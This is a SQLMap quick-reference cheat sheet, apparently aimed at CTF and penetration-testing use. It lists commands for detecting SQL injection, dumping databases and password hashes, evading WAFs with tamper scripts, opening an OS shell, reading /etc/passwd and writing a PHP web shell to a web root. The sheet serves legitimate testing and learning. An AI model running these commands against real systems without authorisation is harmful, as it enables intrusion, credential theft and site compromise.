SQLMap Quick Reference
=====================

BASIC USAGE
  sqlmap -u "http://target/page?id=1"
  sqlmap -u "http://target/page?id=1" --dbs       List databases
  sqlmap -u "http://target/page?id=1" -D db --tables    List tables
  sqlmap -u "http://target/page?id=1" -D db -T tbl --dump   Dump table

POST REQUEST
  sqlmap -u "http://target/login" --data="user=a&pass=b"
  sqlmap -u "http://target/login" --data="user=a&pass=b" -p user

FROM FILE (Burp/ZAP request)
  sqlmap -r request.txt

DETECTION
  --level=5             Increase test level (1-5)
  --risk=3              Increase risk level (1-3)
  -p param              Test specific parameter
  --dbms=mysql          Specify DBMS
  --technique=BEUSTQ    Specify techniques

ENUMERATION
  --current-user        Current database user
  --current-db          Current database
  --dbs                 List all databases
  --tables              List tables
  --columns             List columns
  --dump                Dump data
  --dump-all            Dump everything
  --passwords           Enumerate password hashes
  --privileges          User privileges

AUTHENTICATION
  --cookie="session=abc"          Cookie
  --headers="Authorization: Bearer tok"   Header
  --auth-type=basic --auth-cred=user:pass
  --proxy=http://127.0.0.1:8080

TECHNIQUES
  B  Boolean-based blind
  E  Error-based
  U  Union query
  S  Stacked queries
  T  Time-based blind
  Q  Inline queries

OPTIONS
  --batch              Auto-answer all questions
  --threads=5          Parallel threads
  --random-agent       Random User-Agent
  --tamper=space2comment   Use tamper script
  --os-shell           OS command shell
  --sql-shell          SQL interactive shell
  --file-read=/etc/passwd   Read file
  --file-write=shell.php --file-dest=/var/www/shell.php

COMMON CTF PATTERNS
  # Basic enumeration
  sqlmap -u "http://target/?id=1" --batch --dbs
  sqlmap -u "http://target/?id=1" --batch -D ctf --tables
  sqlmap -u "http://target/?id=1" --batch -D ctf -T flag --dump

  # Bypass WAF
  sqlmap -u URL --tamper=space2comment,between,randomcase

  # Read flag file
  sqlmap -u URL --file-read="/flag.txt"
